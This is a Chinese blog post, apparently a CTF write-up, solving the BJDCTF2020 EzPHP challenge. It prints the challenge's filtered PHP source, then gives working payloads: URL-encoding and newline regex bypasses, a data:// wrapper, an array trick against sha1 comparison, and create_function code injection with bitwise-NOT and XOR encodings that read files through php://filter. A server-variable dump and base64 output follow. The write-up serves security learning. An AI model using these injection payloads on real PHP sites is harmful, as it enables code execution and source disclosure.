HacKerQWQ的博客空间

读取变量getflag-[BJDCTF2020]EzPHP

ctf PHP伪协议 create_function注入
Word count: 2.5kReading time: 15 min
2021/04/09 Share

考点

  • sha1绕过
  • $SERVER绕过
  • php伪协议
  • $REQUEST绕过
  • create_function注入

    源码

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    <?php
    highlight_file(__FILE__);
    error_reporting(0); 

    $file = "1nD3x.php";
    $shana = $_GET['shana'];
    $passwd = $_GET['passwd'];
    $arg = '';
    $code = '';

    echo "<br /><font color=red><B>This is a very simple challenge and if you solve it I will give you a flag. Good Luck!</B><br></font>";

    if($_SERVER) { 
        if (
            preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
            )  
            die('You seem to want to do something bad?'); 
    }

    if (!preg_match('/http|https/i', $_GET['file'])) {
        if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') { 
            $file = $_GET["file"]; 
            echo "Neeeeee! Good Job!<br>";
        } 
    } else die('fxck you! What do you want to do ?!');

    if($_REQUEST) { 
        foreach($_REQUEST as $value) { 
            if(preg_match('/[a-zA-Z]/i', $value))  
                die('fxck you! I hate English!'); 
        } 
    } 

    if (file_get_contents($file) !== 'debu_debu_aqua')
        die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");


    if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
        extract($_GET["flag"]);
        echo "Very good! you know my password. But what is flag?<br>";
    } else{
        die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
    }

    if(preg_match('/^[a-z0-9]*$/isD', $code) || 
    preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) { 
        die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w="); 
    } else { 
        include "flag.php";
        $code('', $arg); 
    } ?>

解题

  1. $_SERVER[‘QUERY_STRING’]不会url解码,可以url编码绕过
  2. aqua_is_cute%0a绕过preg_match
  3. file=data://text/plain,111绕过
  4. shana[]=1&passwd[]=2绕过
  5. create_function注入
    通过;}var_dump(get_defined_vars());//注入执行var_dump(get_defined_vars())得到flag.php的变量
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
flag就在这里,你能拿到它吗?
array(13)
{["_GET"] = > array(5)
{["debu"] = > string(13)
"aqua_is_cute "["file"] = > string(32)
"data://text/plain,debu_debu_aqua"["shana"] = > array(1)
{[0] = > string(1)
"1"} ["passwd"] = > array(1)
{[0] = > string(1)
"2"} ["flag"] = > array(2)
{["arg"] = > string(32)
"}var_dump(get_defined_vars());//"["code"] = > string(15)
"create_function"}} ["_POST"] = > array(2)
{["debu"] = > string(1)
"1"["file"] = > string(1)
"1"} ["_COOKIE"] = > array(0)
{}["_FILES"] = > array(0)
{}["_SERVER"] = > array(58)
{["PHP_EXTRA_CONFIGURE_ARGS"] = > string(77)
"--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi"["HOSTNAME"] = > string(12)
"ca746354539e"["PHP_INI_DIR"] = > string(18)
"/usr/local/etc/php"["SHLVL"] = > string(1)
"1"["HOME"] = > string(14)
"/home/www-data"["PHP_LDFLAGS"] = > string(34)
"-Wl,-O1 -Wl,--hash-style=both -pie"["PHP_CFLAGS"] = > string(83)
"-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64"["PHP_MD5"] = > string(0)
""["PHP_VERSION"] = > string(6)
"7.3.13"["GPG_KEYS"] = > string(81)
"CBAF69F173A0FEA4B537F470D66C9593118BCCB6 F38252826ACD957EF380D39F2F7956BC5DA04B5D"["PHP_CPPFLAGS"] = > string(83)
"-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64"["PHP_ASC_URL"] = > string(62)
"https://www.php.net/get/php-7.3.13.tar.xz.asc/from/this/mirror"["PHP_URL"] = > string(58)
"https://www.php.net/get/php-7.3.13.tar.xz/from/this/mirror"["PATH"] = > string(60)
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"["PHPIZE_DEPS"] = > string(78)
"autoconf dpkg-dev dpkg file g++ gcc libc-dev make pkgconf re2c"["PWD"] = > string(13)
"/var/www/html"["PHP_SHA256"] = > string(64)
"57ac55fe442d2da650abeb9e6fa161bd3a98ba6528c029f076f8bba43dd5c228"["FLAG"] = > string(4)
"null"["USER"] = > string(8)
"www-data"["HTTP_CONNECTION"] = > string(5)
"close"["HTTP_X_FORWARDED_PROTO"] = > string(4)
"http"["HTTP_X_FORWARDED_FOR"] = > string(26)
"223.104.176.195, 127.0.0.1"["HTTP_UPGRADE_INSECURE_REQUESTS"] = > string(1)
"1"["HTTP_REFERER"] = > string(318)
"http://9faafca8-d5c1-41ec-a1ef-a5810f417dca.node3.buuoj.cn/1nD3x.php?%64%65%62%75=%61%71%75%61_is_%63%75%74%65%0A&file=data://text/plain,%64%65%62%75_%64%65%62%75_%61%71%75%61&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&%66%6c%61%67[%61%72%67]=}var_dump(get_defined_vars());//&%66%6c%61%67[%63%6f%64%65]=create_function"[
    "HTTP_ORIGIN"] = > string(58)
"http://9faafca8-d5c1-41ec-a1ef-a5810f417dca.node3.buuoj.cn"["HTTP_CONTENT_TYPE"] = > string(33)
"application/x-www-form-urlencoded"["HTTP_CACHE_CONTROL"] = > string(9)
"max-age=0"["HTTP_ACCEPT_LANGUAGE"] = > string(59)
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"["HTTP_ACCEPT_ENCODING"] = > string(13)
"gzip, deflate"["HTTP_ACCEPT"] = > string(74)
"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"["HTTP_CONTENT_LENGTH"] = > string(2)
"13"["HTTP_USER_AGENT"] = > string(82)
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:83.0) Gecko/20100101 Firefox/83.0"["HTTP_HOST"] = > string(51)
"9faafca8-d5c1-41ec-a1ef-a5810f417dca.node3.buuoj.cn"["SCRIPT_FILENAME"] = > string(23)
"/var/www/html/1nD3x.php"["REDIRECT_STATUS"] = > string(3)
"200"["SERVER_NAME"] = > string(9)
"localhost"["SERVER_PORT"] = > string(2)
"80"["SERVER_ADDR"] = > string(14)
"172.16.134.139"["REMOTE_PORT"] = > string(5)
"48922"["REMOTE_ADDR"] = > string(13)
"172.16.128.15"["SERVER_SOFTWARE"] = > string(12)
"nginx/1.16.1"["GATEWAY_INTERFACE"] = > string(7)
"CGI/1.1"["REQUEST_SCHEME"] = > string(4)
"http"["SERVER_PROTOCOL"] = > string(8)
"HTTP/1.1"["DOCUMENT_ROOT"] = > string(13)
"/var/www/html"["DOCUMENT_URI"] = > string(10)
"/1nD3x.php"["REQUEST_URI"] = > string(260)
"/1nD3x.php?%64%65%62%75=%61%71%75%61_is_%63%75%74%65%0A&file=data://text/plain,%64%65%62%75_%64%65%62%75_%61%71%75%61&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&%66%6c%61%67[%61%72%67]=}var_dump(get_defined_vars());//&%66%6c%61%67[%63%6f%64%65]=create_function"[
    "SCRIPT_NAME"] = > string(10)
"/1nD3x.php"["CONTENT_LENGTH"] = > string(2)
"13"["CONTENT_TYPE"] = > string(33)
"application/x-www-form-urlencoded"["REQUEST_METHOD"] = > string(4)
"POST"["QUERY_STRING"] = > string(249)
"%64%65%62%75=%61%71%75%61_is_%63%75%74%65%0A&file=data://text/plain,%64%65%62%75_%64%65%62%75_%61%71%75%61&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&%66%6c%61%67[%61%72%67]=}var_dump(get_defined_vars());//&%66%6c%61%67[%63%6f%64%65]=create_function"[
    "FCGI_ROLE"] = > string(9)
"RESPONDER"["PHP_SELF"] = > string(10)
"/1nD3x.php"["REQUEST_TIME_FLOAT"] = > float(1608270639.3536)["REQUEST_TIME"] = > int(1608270639)["argv"] = > array(1)
{[0] = > string(249)
"%64%65%62%75=%61%71%75%61_is_%63%75%74%65%0A&file=data://text/plain,%64%65%62%75_%64%65%62%75_%61%71%75%61&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&%66%6c%61%67[%61%72%67]=}var_dump(get_defined_vars());//&%66%6c%61%67[%63%6f%64%65]=create_function"} [
    "argc"] = > int(1)} ["_REQUEST"] = > array(5)
{["debu"] = > string(1)
"1"["file"] = > string(1)
"1"["shana"] = > array(1)
{[0] = > string(1)
"1"} ["passwd"] = > array(1)
{[0] = > string(1)
"2"} ["flag"] = > array(2)
{["arg"] = > string(32)
"}var_dump(get_defined_vars());//"["code"] = > string(15)
"create_function"}} ["file"] = > string(32)
"data://text/plain,debu_debu_aqua"["shana"] = > array(1)
{[0] = > string(1)
"1"} ["passwd"] = > array(1)
{[0] = > string(1)
"2"} ["arg"] = > string(32)
"}var_dump(get_defined_vars());//"["code"] = > string(15)
"create_function"["value"] = > array(2)
{["arg"] = > string(32)
"}var_dump(get_defined_vars());//"["code"] = > string(15)
"create_function"} ["ffffffff11111114ggggg"] = > string(89)
"Baka, do you think it's so easy to get my flag? I hid the real flag in rea1fl4g.php 23333"}

接下来构造
;}require(base64_decode(rea1fl4g.php));var_dump(get_defined_vars());//读取
20210409120130
取反构造;}require(~(%8F%97%8F%C5%D0%D0%99%96%93%8B%9A%8D%D0%8D%9A%9E%9B%C2%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F));//
相当于包含对php://filter/read=convert.base64-encode/resource=rea1fl4g.php取反的源码的base64形式
20210409120106

得到flag的base64

1
PGh0bWw+DQo8aGVhZD4NCjxtZXRhIGNoYXJzZXQ9InV0Zi04Ij4NCjxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9ZWRnZSI+DQo8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIG1heGltdW0tc2NhbGU9MSwgdXNlci1zY2FsYWJsZT1ubyI+DQo8dGl0bGU+UmVhbF9GbGFnIEluIEhlcmUhISE8L3RpdGxlPg0KPC9oZWFkPg0KPC9odG1sPg0KPD9waHANCgllY2hvICLlkqbvvIzkvaDlsYXnhLbmib7liLDmiJHkuobvvJ/vvIHkuI3ov4fnnIvliLDov5nlj6Xor53kuZ/kuI3ku6PooajkvaDlsLHog73mi7/liLBmbGFn5ZOm77yBIjsNCgkkZjRrZV9mbGFnID0gIkJKRHsxYW1fYV9mYWtlX2Y0MTExMWcyMzMzM30iOw0KCSRyZWExX2YxMTE0ZyA9ICJmbGFnezFkMDI0Y2MzLWUzOWQtNGRiNi05MmYzLTc2MDFhMWQzZjlkOX0iOw0KCXVuc2V0KCRyZWExX2YxMTE0Zyk7DQo=

20210409120502

其他解法

_GET传参

1
?deb%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&file=%64%61%74%61%3a%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&rce=%70%68%70%3a%2f%2f%66%69%6c%74%65%72%2f%72%65%61%64%3d%63%6f%6e%76%65%72%74%2e%62%61%73%65%36%34%2d%65%6e%63%6f%64%65%2f%72%65%73%6f%75%72%63%65%3d%72%65%61%31%66%6c%34%67%2e%70%68%70&rce2=r&sha%6e%61[]=a&pa%73sw%64[]=b&fla%67[co%64e]=create_function&fla%67[ar%67]=;}require(get_defined_vars()[_GET][rce]);%0a//

解码得到

1
2
3
?debu=aqua_is_cute
&file=data:,debu_debu_aqua&rce=php://filter/read=convert.base64-encode/resource=rea1fl4g.php&rce2=r&shana[]=a&passwd[]=b&flag[code]=create_function&flag[arg]=;}require(get_defined_vars()[_GET][rce]);
//

这儿利用get_defined_vars()获得通过$_GET传的参数,巧妙地绕过了最后的正则匹配

异或绕过

正则匹配了&和|导致无法与运算和或运算,但是可以^异或和~按位取反。

1
%66%6c%61%67[arg]=}require(%ce%99%93%9e%98%d1%8f%97%8f^%ff%ff%ff%ff%ff%ff%ff%ff%ff);var_dump(get_defined_vars());//

官方wp

https://www.gem-love.com/ctf/770.html

wp中还有通过数组操作的做法

Author:HacKerQWQ

原文链接:https://hackerqwq.github.io/2021/04/09/%E8%AF%BB%E5%8F%96%E5%8F%98%E9%87%8Fgetflag-BJDCTF2020-EzPHP/

发表日期:April 9th 2021, 11:48:23 am

更新日期:April 18th 2021, 12:37:44 am

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. 考点
  2. 2. 源码
  3. 3. 解题
  4. 4. 其他解法
    1. 4.1. _GET传参
    2. 4.2. 异或绕过
  5. 5. 官方wp
Total : 163
2023
2022
2021
2020
ctf PHP反序列化 sql jwt 2021CISCN 文件上传 uncide欺骗 无列名注入 php反射类利用 2021红明谷 输入法取证 盲水印隐写 哈夫曼编码 流量分析 Android md5 shtml 2020CISCN png结构 CRC32 Crypto Java安全 intro 权限提升 Docker CVE Hash php_upload_progress_session hash长度拓展攻击 红蓝对抗 MySQL PHP代码审计 PHP 2021Nep 命令执行 PHP原生类 云函数 JAVA_WEB ThinkPHP 原型链污染 nodejs 源码泄露 SSTI 漏洞分析 渗透测试 代码审计 JAJA XML 漏洞 免杀 机器学习 XSS XXE 硬件安全 社工 编码漏洞 nginx常见文件位置 .htaccess利用 HTTP协议 内网渗透 横向移动 漏洞利用 metasploit 信息收集 CTF PHP伪协议 php pickle 逻辑漏洞 2019CISCN python 多线程 misc图像处理 Nginx LFI redis攻防 提权 C 代码执行 渗透 权限维持 bugs phar反序列化 变量覆盖漏洞 扫描软件 弱类型比较 Django rar伪加密 二维码 文件上传漏洞 文件包含 文件读取漏洞 无参数构造payload 神经网络 红队 SSRF url取反绕过 misc_zip create_function注入 零宽度字符